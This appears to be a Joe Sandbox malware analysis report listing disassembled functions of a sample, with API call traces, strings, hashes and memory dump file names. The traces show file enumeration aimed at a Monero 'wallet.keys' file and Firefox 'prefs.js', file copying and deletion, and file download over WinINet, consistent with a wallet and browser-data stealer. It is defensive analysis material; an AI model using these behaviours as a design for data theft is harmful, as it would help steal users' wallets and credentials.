getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_TIMESTAMP_MODE), ref: 6C5835E0
QueryPerformanceFrequency.KERNEL32(?), ref: 6C5835FD
_strnicmp.API-MS-WIN-CRT-STRING-L1-1-0(?,GenuntelineI,0000000C), ref: 6C58363F
GetSystemTimeAdjustment.KERNEL32(?,?,?), ref: 6C58369F
__aulldiv.LIBCMT ref: 6C5836E4
QueryPerformanceCounter.KERNEL32(?), ref: 6C583773
EnterCriticalSection.KERNEL32(6C60F688), ref: 6C58377E
LeaveCriticalSection.KERNEL32(6C60F688), ref: 6C5837BD
QueryPerformanceCounter.KERNEL32(?), ref: 6C5837C4
EnterCriticalSection.KERNEL32(6C60F688), ref: 6C5837CB
LeaveCriticalSection.KERNEL32(6C60F688), ref: 6C583801
__aulldiv.LIBCMT ref: 6C583883
strcmp.API-MS-WIN-CRT-STRING-L1-1-0(00000000,QPC), ref: 6C583902
strcmp.API-MS-WIN-CRT-STRING-L1-1-0(00000000,GTC), ref: 6C583918
_strnicmp.API-MS-WIN-CRT-STRING-L1-1-0(?,AuthcAMDenti,0000000C), ref: 6C58394C

Strings

AuthcAMDenti, xrefs: 6C583946
QPC, xrefs: 6C5838FC
MOZ_TIMESTAMP_MODE, xrefs: 6C5835DB
GenuntelineI, xrefs: 6C583639
GTC, xrefs: 6C583912

Memory Dump Source

Source File: 00000000.00000002.1938387558.000000006C581000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C580000, based on PE: true

Associated: 00000000.00000002.1938367376.000000006C580000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1938449117.000000006C5FD000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1938473928.000000006C60E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1938494510.000000006C612000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c580000_file.jbxd

Similarity

API ID: CriticalSection$PerformanceQuery$CounterEnterLeave__aulldiv_strnicmpstrcmp$AdjustmentCountFrequencyInitializeSpinSystemTimegetenv
String ID: AuthcAMDenti$GTC$GenuntelineI$MOZ_TIMESTAMP_MODE$QPC
API String ID: 301339242-3790311718
Opcode ID: c196bc05e1350ac9235a3cabf7a847be05f92e093cca614c6ef22f5e0d6560a1
Instruction ID: 4f8a1d1289a59b3aa88277aceaafc628759a16bed444cc01e7665565811ba57b
Opcode Fuzzy Hash: c196bc05e1350ac9235a3cabf7a847be05f92e093cca614c6ef22f5e0d6560a1
Instruction Fuzzy Hash: F1B1D771B193109FDB08DF2ACA9461ABBF5FB8A704F14892DE499E3350D7709901CF8A

Function 003D4910 Relevance: 36.9, APIs: 18, Strings: 3, Instructions: 172
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

wsprintfA.USER32 ref: 003D492C
FindFirstFileA.KERNEL32(?,?), ref: 003D4943
StrCmpCA.SHLWAPI(?,003E0FDC), ref: 003D4971
StrCmpCA.SHLWAPI(?,003E0FE0), ref: 003D4987
FindNextFileA.KERNEL32(000000FF,?), ref: 003D4B7D
FindClose.KERNEL32(000000FF), ref: 003D4B92

Strings

%s\%s, xrefs: 003D49FB
%s\*, xrefs: 003D4920
%s\%s, xrefs: 003D49A4

Memory Dump Source

Source File: 00000000.00000002.1915742704.00000000003C1000.00000040.00000001.01000000.00000003.sdmp, Offset: 003C0000, based on PE: true

Associated: 00000000.00000002.1915678760.00000000003C0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.000000000041A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.0000000000445000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.0000000000448000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.000000000044F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.0000000000452000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.0000000000471000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.000000000047D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.00000000004A2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.00000000004AF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.00000000004CF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.00000000004DB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.00000000004DE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.0000000000565000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.0000000000585000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.000000000058B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.000000000060A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1916260101.000000000061E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1916260101.00000000007AA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1916260101.0000000000881000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1916260101.00000000008A4000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1916260101.00000000008AB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1916260101.00000000008BA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1916706869.00000000008BB000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1916934823.0000000000A53000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1916951836.0000000000A54000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3c0000_file.jbxd

Yara matches

Similarity

API ID: Find$File$CloseFirstNextwsprintf
String ID: %s\%s$%s\%s$%s\*
API String ID: 180737720-445461498
Opcode ID: cc53fab817410bd0e2e857e87c0e5609bb7b4318bb8088611642a09032dea633
Instruction ID: c8ef8d9b4f2690776ff420699af3a47ef36c6eb59db9281d3c362f4eafb51f1d
Opcode Fuzzy Hash: cc53fab817410bd0e2e857e87c0e5609bb7b4318bb8088611642a09032dea633
Instruction Fuzzy Hash: 996153B2940218ABCB25EBE0EC45FEB737DBB48740F048689F54996141EB71EB85CF91

Function 003D3EA0 Relevance: 22.9, APIs: 12, Strings: 1, Instructions: 133fileCOMMON

Download Yara Rule

APIs

wsprintfA.USER32 ref: 003D3EC3
FindFirstFileA.KERNEL32(?,?), ref: 003D3EDA
StrCmpCA.SHLWAPI(?,003E0FAC), ref: 003D3F08
StrCmpCA.SHLWAPI(?,003E0FB0), ref: 003D3F1E
FindNextFileA.KERNEL32(000000FF,?), ref: 003D406C
FindClose.KERNEL32(000000FF), ref: 003D4081

Strings

%s\%s, xrefs: 003D3EB7

Memory Dump Source

Source File: 00000000.00000002.1915742704.00000000003C1000.00000040.00000001.01000000.00000003.sdmp, Offset: 003C0000, based on PE: true

Associated: 00000000.00000002.1915678760.00000000003C0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.000000000041A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.0000000000445000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.0000000000448000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.000000000044F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.0000000000452000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.0000000000471000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.000000000047D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.00000000004A2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.00000000004AF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.00000000004CF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.00000000004DB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.00000000004DE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.0000000000565000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.0000000000585000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.000000000058B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.000000000060A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1916260101.000000000061E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1916260101.00000000007AA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1916260101.0000000000881000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1916260101.00000000008A4000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1916260101.00000000008AB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1916260101.00000000008BA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1916706869.00000000008BB000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1916934823.0000000000A53000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1916951836.0000000000A54000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3c0000_file.jbxd

Yara matches

Similarity

API ID: Find$File$CloseFirstNextwsprintf
String ID: %s\%s
API String ID: 180737720-4073750446
Opcode ID: 741a1a249fa88509fa39483b22e44e2048f2dcf643756114d6fb40403c975574
Instruction ID: 422c059d1fb6e9e4e6b65d41dd2de2f9780e0ced1a9d78cb5e6885131ead203d
Opcode Fuzzy Hash: 741a1a249fa88509fa39483b22e44e2048f2dcf643756114d6fb40403c975574
Instruction Fuzzy Hash: 2F5157B6900318ABCB25FBB0DC85EEE737DBB44300F00858DB65996180DB75EB858F51

Function 003CF6B0 Relevance: 16.0, APIs: 8, Strings: 1, Instructions: 275fileCOMMON

Download Yara Rule

APIs

Part of subcall function 003DA740: lstrcpy.KERNEL32(003E0E17,00000000), ref: 003DA788

Part of subcall function 003DA920: lstrcpy.KERNEL32(00000000,?), ref: 003DA972
Part of subcall function 003DA920: lstrcat.KERNEL32(00000000), ref: 003DA982

Part of subcall function 003DA9B0: lstrlen.KERNEL32(?,00E69F38,?,\Monero\wallet.keys,003E0E17), ref: 003DA9C5
Part of subcall function 003DA9B0: lstrcpy.KERNEL32(00000000), ref: 003DAA04
Part of subcall function 003DA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 003DAA12

Part of subcall function 003DA8A0: lstrcpy.KERNEL32(?,003E0E17), ref: 003DA905

FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,003E15B8,003E0D96), ref: 003CF71E
StrCmpCA.SHLWAPI(?,003E15BC), ref: 003CF76F
StrCmpCA.SHLWAPI(?,003E15C0), ref: 003CF785
FindNextFileA.KERNELBASE(000000FF,?), ref: 003CFAB1
FindClose.KERNEL32(000000FF), ref: 003CFAC3

Strings

prefs.js, xrefs: 003CF812

Memory Dump Source

Source File: 00000000.00000002.1915742704.00000000003C1000.00000040.00000001.01000000.00000003.sdmp, Offset: 003C0000, based on PE: true

Associated: 00000000.00000002.1915678760.00000000003C0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.000000000041A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.0000000000445000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.0000000000448000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.000000000044F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.0000000000452000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.0000000000471000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.000000000047D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.00000000004A2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.00000000004AF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.00000000004CF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.00000000004DB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.00000000004DE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.0000000000565000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.0000000000585000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.000000000058B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.000000000060A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1916260101.000000000061E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1916260101.00000000007AA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1916260101.0000000000881000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1916260101.00000000008A4000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1916260101.00000000008AB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1916260101.00000000008BA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1916706869.00000000008BB000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1916934823.0000000000A53000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1916951836.0000000000A54000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3c0000_file.jbxd

Yara matches

Similarity

API ID: lstrcpy$Find$Filelstrcat$CloseFirstNextlstrlen
String ID: prefs.js
API String ID: 3334442632-3783873740
Opcode ID: c5b8f150acd3e4b1b6c0f0ea4af20d52058d1dcd632403f0a46b6690361c1d79
Instruction ID: 3345de863d154254b23ceea94af3391cce7b8a8f7a652b9eb76557f24622d8f0
Opcode Fuzzy Hash: c5b8f150acd3e4b1b6c0f0ea4af20d52058d1dcd632403f0a46b6690361c1d79
Instruction Fuzzy Hash: 27B157729006189BCB25FF60ED55FEE7779AF54300F408169E80A9A281EF315F49DF92

Function 003C16D0 Relevance: 14.5, APIs: 7, Strings: 1, Instructions: 492fileCOMMON

Download Yara Rule

APIs

Part of subcall function 003DA740: lstrcpy.KERNEL32(003E0E17,00000000), ref: 003DA788

FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,003E510C,?,?,?,003E51B4,?,?,00000000,?,00000000), ref: 003C1923
StrCmpCA.SHLWAPI(?,003E525C), ref: 003C1973
StrCmpCA.SHLWAPI(?,003E5304), ref: 003C1989
CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 003C1D40
DeleteFileA.KERNEL32(00000000), ref: 003C1DCA
FindNextFileA.KERNEL32(000000FF,?), ref: 003C1E20
FindClose.KERNEL32(000000FF), ref: 003C1E32

Part of subcall function 003DA920: lstrcpy.KERNEL32(00000000,?), ref: 003DA972
Part of subcall function 003DA920: lstrcat.KERNEL32(00000000), ref: 003DA982

Part of subcall function 003DA9B0: lstrlen.KERNEL32(?,00E69F38,?,\Monero\wallet.keys,003E0E17), ref: 003DA9C5
Part of subcall function 003DA9B0: lstrcpy.KERNEL32(00000000), ref: 003DAA04
Part of subcall function 003DA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 003DAA12

Part of subcall function 003DA8A0: lstrcpy.KERNEL32(?,003E0E17), ref: 003DA905

Strings

\*.*, xrefs: 003C17F1

Memory Dump Source

Source File: 00000000.00000002.1915742704.00000000003C1000.00000040.00000001.01000000.00000003.sdmp, Offset: 003C0000, based on PE: true

Associated: 00000000.00000002.1915678760.00000000003C0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.000000000041A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.0000000000445000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.0000000000448000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.000000000044F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.0000000000452000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.0000000000471000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.000000000047D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.00000000004A2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.00000000004AF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.00000000004CF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.00000000004DB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.00000000004DE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.0000000000565000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.0000000000585000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.000000000058B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.000000000060A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1916260101.000000000061E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1916260101.00000000007AA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1916260101.0000000000881000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1916260101.00000000008A4000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1916260101.00000000008AB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1916260101.00000000008BA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1916706869.00000000008BB000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1916934823.0000000000A53000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1916951836.0000000000A54000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3c0000_file.jbxd

Yara matches

Similarity

API ID: Filelstrcpy$Find$lstrcat$CloseCopyDeleteFirstNextlstrlen
String ID: \*.*
API String ID: 1415058207-1173974218
Opcode ID: 29763619cdd4927cd4ee760df0f1bd34f9ec4079cee4dbb9bd2c1056943e5d9c
Instruction ID: 187861a5def2216e365261ac4362f22216879d9db19d9541c532ff1cc364d6e9
Opcode Fuzzy Hash: 29763619cdd4927cd4ee760df0f1bd34f9ec4079cee4dbb9bd2c1056943e5d9c
Instruction Fuzzy Hash: 041276739105589BCB17FB60ED96EEE7378AF14300F40419AB50AAA191EF306F89DF91

Function 003CDA80 Relevance: 13.8, APIs: 9, Instructions: 255fileCOMMON

Download Yara Rule

APIs

Part of subcall function 003DA740: lstrcpy.KERNEL32(003E0E17,00000000), ref: 003DA788

Part of subcall function 003DA920: lstrcpy.KERNEL32(00000000,?), ref: 003DA972
Part of subcall function 003DA920: lstrcat.KERNEL32(00000000), ref: 003DA982

Part of subcall function 003DA9B0: lstrlen.KERNEL32(?,00E69F38,?,\Monero\wallet.keys,003E0E17), ref: 003DA9C5
Part of subcall function 003DA9B0: lstrcpy.KERNEL32(00000000), ref: 003DAA04
Part of subcall function 003DA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 003DAA12

Part of subcall function 003DA8A0: lstrcpy.KERNEL32(?,003E0E17), ref: 003DA905

FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,003E14B0,003E0C2A), ref: 003CDAEB
StrCmpCA.SHLWAPI(?,003E14B4), ref: 003CDB33
StrCmpCA.SHLWAPI(?,003E14B8), ref: 003CDB49
FindNextFileA.KERNELBASE(000000FF,?), ref: 003CDDCC
FindClose.KERNEL32(000000FF), ref: 003CDDDE

Memory Dump Source

Source File: 00000000.00000002.1915742704.00000000003C1000.00000040.00000001.01000000.00000003.sdmp, Offset: 003C0000, based on PE: true

Associated: 00000000.00000002.1915678760.00000000003C0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.000000000041A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.0000000000445000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.0000000000448000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.000000000044F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.0000000000452000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.0000000000471000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.000000000047D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.00000000004A2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.00000000004AF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.00000000004CF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.00000000004DB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.00000000004DE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.0000000000565000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.0000000000585000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.000000000058B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.000000000060A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1916260101.000000000061E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1916260101.00000000007AA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1916260101.0000000000881000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1916260101.00000000008A4000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1916260101.00000000008AB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1916260101.00000000008BA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1916706869.00000000008BB000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1916934823.0000000000A53000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1916951836.0000000000A54000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3c0000_file.jbxd

Yara matches

Similarity

API ID: lstrcpy$Find$Filelstrcat$CloseFirstNextlstrlen
String ID:
API String ID: 3334442632-0
Opcode ID: 61282f730ce5823ccbf527a7d51810b74322ee23603daeeca6100e168949d916
Instruction ID: e14c5952567422bc7af3ac4305e320447b908dfae92eab704756c20055edb662
Opcode Fuzzy Hash: 61282f730ce5823ccbf527a7d51810b74322ee23603daeeca6100e168949d916
Instruction Fuzzy Hash: 9691487390060457CB16FBB0ED56EED777DAF84300F408669F90ADA281EE349B19DB92

Function 003C60A0 Relevance: 13.6, APIs: 9, Instructions: 133networkfileCOMMON

Download Yara Rule

APIs

Part of subcall function 003DA7A0: lstrcpy.KERNEL32(?,00000000), ref: 003DA7E6

Part of subcall function 003C47B0: lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 003C4839
Part of subcall function 003C47B0: InternetCrackUrlA.WININET(00000000,00000000), ref: 003C4849

InternetOpenA.WININET(003E0DF7,00000001,00000000,00000000,00000000), ref: 003C610F
StrCmpCA.SHLWAPI(?,00E6F518), ref: 003C6147
InternetOpenUrlA.WININET(00000000,00000000,00000000,00000000,00000100,00000000), ref: 003C618F
CreateFileA.KERNEL32(00000000,40000000,00000003,00000000,00000002,00000080,00000000), ref: 003C61B3
InternetReadFile.WININET(?,?,00000400,?), ref: 003C61DC
WriteFile.KERNEL32(?,?,00000000,?,00000000), ref: 003C620A
CloseHandle.KERNEL32(?,?,00000400), ref: 003C6249
InternetCloseHandle.WININET(?), ref: 003C6253
InternetCloseHandle.WININET(00000000), ref: 003C6260

Memory Dump Source

Source File: 00000000.00000002.1915742704.00000000003C1000.00000040.00000001.01000000.00000003.sdmp, Offset: 003C0000, based on PE: true

Associated: 00000000.00000002.1915678760.00000000003C0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.000000000041A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.0000000000445000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.0000000000448000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.000000000044F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.0000000000452000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.0000000000471000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.000000000047D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.00000000004A2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.00000000004AF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.00000000004CF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.00000000004DB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.00000000004DE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.0000000000565000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.0000000000585000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.000000000058B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.000000000060A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1916260101.000000000061E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1916260101.00000000007AA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1916260101.0000000000881000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1916260101.00000000008A4000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1916260101.00000000008AB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1916260101.00000000008BA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1916706869.00000000008BB000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1916934823.0000000000A53000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1916951836.0000000000A54000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3c0000_file.jbxd

Yara matches

Similarity

API ID: Internet$CloseFileHandle$Open$CrackCreateReadWritelstrcpylstrlen
String ID:
API String ID: 2507841554-0
Opcode ID: b73a4be4d4fb4138b2bf6d73dc503435ae2a95a90ad9c05ba7bc9048aea1c550
Instruction ID: 6177f4507c9fc73dea90c47f6defe4dd6ea5101db8b72c2c222074b4461962f8
Opcode Fuzzy Hash: b73a4be4d4fb4138b2bf6d73dc503435ae2a95a90ad9c05ba7bc9048aea1c550
Instruction Fuzzy Hash: D3517FB1940218ABDB21DF90DD46FEE77B9EB44701F10849CB605AB2C0DB746E85CF95

Function 003D7B90 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 114memoryCOMMON

Download Yara Rule

APIs

Part of subcall function 003DA740: lstrcpy.KERNEL32(003E0E17,00000000), ref: 003DA788

GetKeyboardLayoutList.USER32(00000000,00000000,003E05AF), ref: 003D7BE1
LocalAlloc.KERNEL32(00000040,?), ref: 003D7BF9
GetKeyboardLayoutList.USER32(?,00000000), ref: 003D7C0D
GetLocaleInfoA.KERNEL32(?,00000002,?,00000200), ref: 003D7C62
LocalFree.KERNEL32(00000000), ref: 003D7D22

Strings

/ , xrefs: 003D7C7F

Memory Dump Source

Source File: 00000000.00000002.1915742704.00000000003C1000.00000040.00000001.01000000.00000003.sdmp, Offset: 003C0000, based on PE: true

